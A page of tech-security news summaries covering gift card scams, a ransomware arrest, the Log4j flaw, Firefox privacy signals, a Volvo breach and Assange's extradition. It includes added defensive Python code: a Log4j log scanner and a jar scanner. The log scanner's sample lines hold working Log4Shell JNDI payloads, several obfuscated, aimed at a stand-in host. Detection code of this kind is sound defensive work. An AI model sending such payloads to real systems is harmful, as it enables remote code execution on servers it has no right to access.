More stories

  • Paying a debt by gift card? Don't fall for this scam

    The Federal Trade Commission’s (FTC’s) latest “data spotlight” release shows $148 million in gift card payment scams recorded for the first nine months of 2021. This growing trend already exceeds the total number and dollar amount of similar scams logged by the agency throughout the entirety of 2020. This type of scam involves a malicious party convincing the target that they are required to provide some form of payment to settle a debt. The grift usually comes with threats of legal action, wage garnishment, or jail time should the target not comply with the request of the fictitious company or government agency the caller claims to represent. In reality, these calls are a way for unscrupulous individuals or criminal rings to obtain gift card codes they can use illicitly or resell through online black markets for profit. The data spotlight shows more than 40,000 consumers were affected by these scams during the first three quarters of 2021, with the practice peaking at $51 million and 14,000 reports during Q1 alone. Median losses per incident rose as well, from $700 in 2018 to $1,000 in 2021. Much larger thefts of $5,000 or more now represent more than 8% of reports, showing these thieves are becoming more brazen. The most popular gift card to request among scammers, by far, is one for Target stores; these represented $35 million in scam payments between January and September 2021. Google Play was a distant second at $17 million, followed by Apple ($16 million), eBay ($10 million), and Walmart ($6 million). Interestingly, even when the victim was directed to purchase a gift card for another retailer, Target was the store scammers most often told victims to buy it from. Walmart, Best Buy, CVS, and Walgreens were also popular with scammers, the FTC said.

    If all of these facts weren’t unsettling enough, the agency noted that some scammers even coach their victims to avoid detection. The FTC has evidence of criminals instructing victims to visit multiple stores and make several smaller purchases to avoid suspicion, with some even providing coaching on what to tell cashiers who ask questions about the purchase. The FTC once again urged consumers to immediately hang up on any caller who claims to be collecting a debt via gift card. In case it needs to be said again: no government agency or commercial entity of any kind will ever attempt to collect a debt from you via gift card. The FTC suggests that anyone who believes they may have been targeted by a scammer visit its informational site on gift card scams and report the incident to its fraud division.

  • Ransomware suspect arrested over attacks on 'high-profile' organisations

    Europol’s European Cybercrime Centre has worked with the Romanian National Police and the FBI on the arrest of a suspected ransomware affiliate who is alleged to have targeted high-profile organisations and companies for their sensitive data. Europol said a 41-year-old Romanian man has been arrested in Craiova, Romania. It said the man is suspected of compromising the network of a large Romanian IT company which delivers services to clients in the retail, energy and utilities sectors.

    The suspect is accused of targeting organisations in ransomware attacks, encrypting files and stealing sensitive data. He is suspected of demanding a “sizeable” ransom payment in cryptocurrency, threatening to leak the stolen data if the victim didn’t give in to the extortion attempt. The stolen information included financial information about the company, personal information about employees, customer details and other sensitive data, and the attacker attempted to blackmail the victim into paying a ransom under threat of publishing it. It wasn’t revealed whether this extortion attempt was successful. Europol supported the investigation by tracing cryptocurrency payments, providing malware analysis and forensic support, and deploying experts to Romania.

    The arrest is the latest in a string of arrests by the Romanian authorities, which last month arrested two individuals suspected of involvement in Sodinokibi/REvil ransomware attacks.

    A recent report by Europol warned that ransomware attacks are getting more sophisticated as cyber criminals look towards new tactics and techniques to maximise the chances of successfully receiving a ransom payment, something which regularly costs victims millions of dollars. “Perpetrators continue to be increasingly ruthless and methodical in their modi operandi,” said the report.

  • Log4j zero-day flaw: What you need to know and how to protect yourself

    A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and carries a CVSS severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a widely used Java logging framework. Since last week’s alert by CERT New Zealand that CVE-2021-44228, a remote code execution flaw in Log4j, was already being exploited in the wild, warnings have been issued by several national cybersecurity agencies, including the US Cybersecurity and Infrastructure Security Agency (CISA) and the UK’s National Cyber Security Centre (NCSC). Internet infrastructure provider Cloudflare said Log4j exploit attempts began on December 1.

    What devices and applications are at risk?

    Essentially any internet-exposed system is at risk if it runs Apache Log4j 2, versions 2.0 to 2.14.1. NCSC notes that Log4j version 2 (Log4j2), the affected branch, is included in the Apache Struts2, Solr, Druid, Flink, and Swift frameworks. Mirai, a botnet that targets all manner of internet-connected (IoT) devices, has adopted an exploit for the flaw. Cisco and VMware have released patches for their affected products. AWS has detailed how the flaw affects its services, said it is working on patching its services that use Log4j, and has released mitigations for services like CloudFront. Likewise, IBM said it is “actively responding” to the Log4j vulnerability across IBM’s own infrastructure and its products; IBM has confirmed WebSphere 8.5 and 9.0 are vulnerable. Oracle has issued a patch for the flaw, too.

    “Due to the severity of this vulnerability and the publication of exploit code on various sites, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible,” it said.

    Necessary actions: device discovery and patching

    CISA’s main advice is to identify internet-facing devices running Log4j and upgrade them to version 2.15.0, or to apply the mitigations provided by vendors “immediately”. It also recommends setting up alerts for probes or attacks on devices running Log4j. “To be clear, this vulnerability poses a severe risk,” CISA director Jen Easterly said Sunday. “We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action.” Additional steps recommended by CISA include: enumerating any external-facing devices with Log4j installed; ensuring the security operations center actions every alert raised on those devices; and installing a web application firewall (WAF) with rules that focus on Log4j.

    AWS has updated its WAF rule set, AWSManagedRulesKnownBadInputsRuleSet (AMR), to detect and mitigate Log4j attack attempts and scanning. It also has mitigation options that can be enabled for CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync, and it is currently updating Amazon OpenSearch Service to the patched version of Log4j. NCSC recommends updating to version 2.15.0 or later and, where that is not possible, mitigating the flaw by setting the system property “log4j2.formatMsgNoLookups” to “true” (effective on Log4j 2.10 and later) or by removing the JndiLookup class from the classpath (which works on any affected 2.x version).

    Part of the challenge will be identifying software harboring the Log4j vulnerability. The Netherlands’ Nationaal Cyber Security Centrum (NCSC-NL) has posted a comprehensive and sourced A-Z list on GitHub of all affected products it is aware of, marking each as vulnerable, not vulnerable, under investigation, or fixed. The list of products illustrates how widespread the vulnerability is, spanning cloud services, developer services, security devices, mapping services, and more. Vendors with popular products known to be still vulnerable include Atlassian, Amazon, Microsoft Azure, Cisco, Commvault, ESRI, Exact, Fortinet, JetBrains, Nelson, Nutanix, OpenMRS, Oracle, Red Hat, Splunk, Soft, and VMware. The list is even longer when adding products where a patch has been released.

    NCC Group has posted several network-detection rules to detect exploitation attempts and indicators of successful exploitation. Finally, Microsoft has released its set of indicators of compromise and guidance for preventing attacks on the Log4j vulnerability. Examples of post-exploitation activity that Microsoft has seen include installing coin miners, deploying Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.
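    Added example (not code from the article, NCC Group, Microsoft or AWS): a small Python detector for the exploit string in web access logs, of the kind a security operations team would run against the WAF or web-server logs of the internet-facing devices CISA asks to be enumerated. Real attempts rarely arrive as a plain "${jndi:ldap://...}"; in-the-wild payloads use URL encoding, "${lower:j}" and "${::-j}" style nested lookups to dodge naive signatures, so the code normalises those before matching. The log lines, the hostname attacker.example and the list of schemes are constructed for illustration.

```python
"""Flag Log4Shell (CVE-2021-44228) exploitation attempts in web access logs.

Added example: normalises the common payload obfuscations seen in the wild
(URL encoding, ${lower:x}/${upper:x}, ${xxx:-x} default-value tricks) before
matching, so a plain '${jndi:' signature is not trivially bypassed.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /login HTTP/1.1" 200 100 "-" "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://attacker.example/d} HTTP/1.1" 200 10 "-" "-"',
]

# ${lower:j} / ${upper:J} evaluate to the inner text once case is ignored.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${env:NOPE:-j} and ${::-j} are "default value" lookups: an unknown key
# resolves to whatever follows ':-'.
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation a real lookup reads ${jndi:<scheme>:<host>...}.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/:}\s]+)")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo layered URL-encoding and nested lookup obfuscation (bounded)."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)                  # %24%7B -> ${
        text = CASE_LOOKUP.sub(r"\1", text)   # ${lower:j} -> j
        text = DEFAULT_VALUE.sub(r"\1", text) # ${::-j}    -> j
        if text == before:                    # nothing left to peel off
            break
    return text.lower()


def scan_line(line: str):
    """Return (scheme, callback_host) if the line carries a JNDI lookup, else None."""
    m = JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(1), m.group(2)


def scan_logs(lines):
    """Return one finding per matching line: (line_no, scheme, callback_host)."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            findings.append((n, hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for n, scheme, host in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

    The callback host is worth keeping as an indicator: the same LDAP or RMI listener usually appears across many victims, and a hit on a host that is not internet-facing (a SIEM or log collector that ingested the string second-hand) is exactly the delayed-callback case Talos describes.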

  • Log4j flaw: Attackers are making thousands of attempts to exploit this severe vulnerability

    Cyber attackers are making over a hundred attempts to exploit a critical security vulnerability in the Java logging library Apache Log4j every minute, security researchers have warned. The Log4j flaw (now also known as “Log4Shell”) is a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, with warnings that it can allow unauthenticated remote code execution and access to servers. Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning that a wide range of software could be at risk from attempts to exploit the vulnerability. Attackers are already scanning the internet for vulnerable instances of Log4j, with cybersecurity researchers at Check Point warning that there are over 100 attempts to exploit the vulnerability every minute. Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage the Log4j vulnerability to install cryptocurrency-mining malware, and there are also reports of several botnets, including Mirai, Tsunami, and Kinsing, attempting to leverage it. Researchers at Microsoft have also warned about attacks taking advantage of the Log4j vulnerability, including a range of cryptomining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.

    It’s common for cyber criminals to make efforts to exploit newly disclosed vulnerabilities in order to have the best chance of taking advantage of them before they’re remediated, but in this case the ubiquity of Log4j, and the fact that many organisations may be unaware it is part of their estate, means there could be a much larger window for attackers to scan for and exploit vulnerable systems. And while cyber criminals leveraging the Log4j vulnerability to install cryptomining malware might initially appear to be a relatively low-level threat, it’s likely that more capable, more dangerous attackers will follow.


    “I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security and critical infrastructure,” said Lotem Finkelstein, director of threat intelligence and research for Check Point. The severity of the vulnerability in such a widely used library means that organisations and technology vendors are being urged to counter the threat as soon as possible. “In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable,” said an alert by the UK’s National Cyber Security Centre (NCSC). While the Log4j security issue only recently came to light, evidence suggests that attackers had been exploiting the vulnerability for some time before it was publicly disclosed.

  • Log4j RCE activity began on December 1 as botnets start using vulnerability

    Image: Kevin Beaumont
    Exploitation of the nasty vulnerability in the Java logging library Apache Log4j that allows unauthenticated remote code execution may have begun as early as December 1. “Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince said on Twitter. “That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.” Cisco Talos said in a blog post that it observed activity for the vulnerability, known as CVE-2021-44228, from December 2, and that those looking for indicators of compromise should extend their searches at least that far back. Thanks to the ubiquity of the affected library, Talos said it was seeing a lag between attackers’ mass scanning and the resulting callbacks, which could be due to vulnerable but non-targeted systems, such as SIEMs and log collectors, being triggered when they later process the logged exploit string. It added that the Mirai botnet was starting to use the vulnerability. Researchers at Netlab 360 said they had seen the Log4j vulnerability used to build Muhstik and Mirai botnets that went after Linux devices. Over the weekend, vendors rushed to get patches out and document workarounds for affected products. The end result has been product matrices such as those from VMware and Cisco, where some products have patches available, some have workarounds, and others remain vulnerable. Both vendors scored CVE-2021-44228 as a perfect 10.

    The suggested workarounds typically either set the log4j2.formatMsgNoLookups property to true or remove the JndiLookup class from the classpath used by Java. A Reddit post from NCC Group, which is being updated regularly, shows how the exploit can be used to exfiltrate AWS secrets, as well as all manner of Java system properties. One security researcher was able to trigger the exploit by going Little Bobby Tables on his iPhone’s device name. Sophos said it was seeing the vulnerability already being used by cryptominers. On the more enjoyable front, a Minecraft mod developer was able to use the vulnerability to turn a Minecraft server into one that played Doom instead. “For some context, this is an entirely vanilla client connecting to a modded server, which, through this exploit, is sending over and executing the code to run doom,” Gegy said. Microsoft threat analyst Kevin Beaumont said defence in depth was “probably your best option”. “To give a spoiler for Log4Shell, this is going to take weeks to play out to establish attack surface (it is large) and then maybe a month or more for patches to be made available,” he said.
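    The discovery step these workarounds depend on (CISA's advice above to enumerate every device with Log4j installed, and checking afterwards that the JndiLookup class really is gone once a workaround has been applied) can be scripted. The following Python is an added example and not tooling from Apache, CISA, NCSC or any vendor named here: it opens each archive, recurses into jars nested inside fat jars and wars, reads the log4j-core version from the Maven pom.properties and checks for the JndiLookup class. The sample fat jar is built in memory with placeholder bytes so the script runs offline; the 2.15.0 threshold is the article's figure and should be replaced with whatever the current Apache advisory names.

```python
"""Find Log4j 2 (log4j-core) inside jars, including jars nested in fat jars and
wars, and report whether the JndiLookup class abused by CVE-2021-44228 is present.

Added example for the "device discovery" and "remove JndiLookup from the
classpath" advice in the article; not Apache, CISA or vendor tooling.
"""
import io
import os
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_EXT = (".jar", ".war", ".ear", ".zip")
# Minimum fixed version as given in the article (assumption for this example);
# check the current Apache advisory before relying on this number.
FIXED = (2, 15, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparsable."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())


def verdict(version, has_jndi):
    """Classify one log4j-core occurrence."""
    if version is not None and version >= FIXED:
        return "patched"
    if not has_jndi:
        return "mitigated-class-removed"   # old version, but JndiLookup stripped
    return "vulnerable" if version else "vulnerable-version-unknown"


def scan_jar(data: bytes, path: str, findings=None):
    """Walk an archive (as bytes) recursively; collect (path, version, has_jndi, verdict)."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                       # not an archive (or corrupt); skip
    with zf:
        names = zf.namelist()
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            version = parse_version(m.group(1)) if m else None
        has_jndi = JNDI_CLASS in names
        if has_jndi or version is not None:
            findings.append((path, version, has_jndi, verdict(version, has_jndi)))
        for name in names:                    # recurse into bundled jars/wars
            if name.lower().endswith(NESTED_EXT):
                scan_jar(zf.read(name), f"{path}!{name}", findings)
    return findings


def scan_tree(root):
    """Scan every archive under a directory (the on-host discovery step)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(NESTED_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    scan_jar(fh.read(), full, findings)
    return findings


def build_sample_fat_jar() -> bytes:
    """Construct (in memory) a fat jar bundling a vulnerable-looking log4j-core.
    The .class entries are placeholder bytes, not real bytecode."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                              "artifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    fat = io.BytesIO()
    with zipfile.ZipFile(fat, "w") as z:
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
        z.writestr("BOOT-INF/classes/app/Main.class", b"\xca\xfe\xba\xbe")
    return fat.getvalue()


if __name__ == "__main__":
    import sys
    results = (scan_tree(sys.argv[1]) if len(sys.argv) > 1
               else scan_jar(build_sample_fat_jar(), "sample-app.jar"))
    for path, version, has_jndi, v in results:
        print(f"{v:28} {path} version={version} "
              f"JndiLookup={'present' if has_jndi else 'absent'}")
```

    Run it with a directory argument to walk a real host. Two caveats a practitioner should keep in mind: a missing pom.properties (shaded or repackaged builds) leaves the version unknown, which the script deliberately treats as vulnerable rather than clean, and the formatMsgNoLookups workaround leaves the class in place, so a "vulnerable" result on a host mitigated that way has to be reconciled against the JVM's system properties rather than the archive alone.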

  • Mozilla rolls out GPC for all Firefox users, but enforcement limited to two states

    Mozilla has expanded its implementation of Global Privacy Control (GPC) to all users after rolling it out on a limited basis in October. The feature, which tells websites not to sell or share your personal data, was previously only available in Firefox Nightly, Mozilla’s pre-release channel. As of this week, GPC is available for all Firefox users to turn on if they wish. Unfortunately for most US users, this feature may not have much effect. The GPC is required under the California Consumer Privacy Act (CCPA) and Europe’s General Data Protection Regulation (GDPR), as well as Colorado’s privacy law, but no other US states have laws that will enforce it. Even California and Colorado have faced criticism for loopholes in their laws that make it difficult to actually enforce the signal. Mozilla told ZDNet that GPC complements technical anti-tracking features integrated into Firefox, like Enhanced Tracking Protection and Total Cookie Protection. “By sending a signal to the websites that people visit, telling them that the person does not want to be tracked and does not want their data to be sold, it helps address the tracking conducted by websites through first-party cookies,” Mozilla said in a statement. “We think it can play an integral role in making a right to opt-out meaningful and easy to use for consumers. GPC is getting traction both in California and in Colorado. Now that we expect websites to start honoring GPC, we want to start providing this option to Firefox users. Yet, the rules around the enforceability of GPC under the CCPA remain ambiguous and leave space for businesses to ignore the signal sent by the browser on behalf of consumers.”

    The company noted that last month it shared feedback with the California Privacy Protection Agency, encouraging the California AG and other privacy agencies globally to expressly require businesses to comply with GPC. Jennifer Hodges, Mozilla’s head of US public policy, said the GPC signal is sent by Firefox to websites regardless of the state the user is in. “However, the GPC may not be enforceable in jurisdictions without privacy legislation that include do not sell provisions which allow for the GPC signal to act as a universal opt-out,” Hodges explained. “For someone in a state that does not have a privacy law, the GPC may not be enforceable. California and Colorado are two states that have GPC-like provisions at the moment.” Hodges said history has shown that without a clear legal mandate, most businesses will not comply with consumer opt-out signals sent through browsers. “This vacuum is the same reason that Do Not Track (“DNT”) failed to gain adoption. It was eventually removed by all major browsers because it created a false sense of consumer protection that could not be enforced,” Hodges added. “The 2023 Colorado Privacy Law has taken this step, and the addition of California would pave the path for other global privacy regulators to similarly update their laws. In addition, we think that enforcement authorities should also expect businesses to interpret the GPC as governing both the direct sale of consumer’s information as well as the sharing of consumers’ information for programmatic advertising targeting purposes. Regulators, consistent with the intent of CCPA and CPRA, must step in to give tools like the GPC enforcement teeth and to ensure consumers’ choices are honored.”

  • Volvo announces some R&D files stolen during cyberattack

    Volvo Cars has released a statement confirming a breach of sensitive files that resulted from a cyberattack. Volvo said it is now aware that “one of its file repositories has been illegally accessed by a third party.” “Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion. Volvo Cars has earlier today concluded, based on information available, that there may be an impact on the company’s operation,” Volvo said in a statement. “After detecting the unauthorised access, the company immediately implemented security countermeasures including steps to prevent further access to its property and notified relevant authorities.” Volvo added that it is still investigating the incident and has hired a cybersecurity firm to help “investigate the property theft.” The attack did not have “an impact on the safety or security of its customers’ cars or their personal data,” the company noted in its statement, but it qualified that assessment as being based only on “currently available information.” Bleeping Computer reported that the Snatch ransomware group has claimed responsibility for the attack after adding the company to its leak site on November 30. The group has already published a small portion of the documents it stole on that leak site.

    According to Sophos, the group has been active since 2018 and gained notoriety in 2019 for a novel trick in which it bypassed antivirus software by rebooting an infected computer into Safe Mode and running the ransomware’s file-encryption process from there. The group became known for buying access into victim networks and lurking for days or weeks, expanding its foothold in a company before initiating the ransomware process. The group also became well known as a ransomware gang that engaged in data theft in addition to encrypting victim networks. Erich Kron, security awareness advocate at KnowBe4, said most ransomware is spread through phishing emails or through exploiting RDP instances open to the internet, noting that the latter is a hallmark of Snatch. “The Snatch gang makes great use of RDP in infection and lateral movement within an organization. To defend against these attacks, organizations are wise to ensure employees are trained on the importance of using complex passwords and not reusing passwords with other accounts. Organizations should also be on high alert for brute force attempts against RDP,” Kron said.

  • UK High Court reverses course, approves Julian Assange's extradition to US

    A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 


    Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual term of imprisonment would be far shorter. This decision reverses an earlier ruling made in January 2021, which denied the US request on the grounds that extradition posed too great a risk to Assange’s wellbeing. That judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also relies on a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.” Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal “at the earliest possible moment.” She called the ruling a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the chilling effect of the prosecution on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US.

    Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 
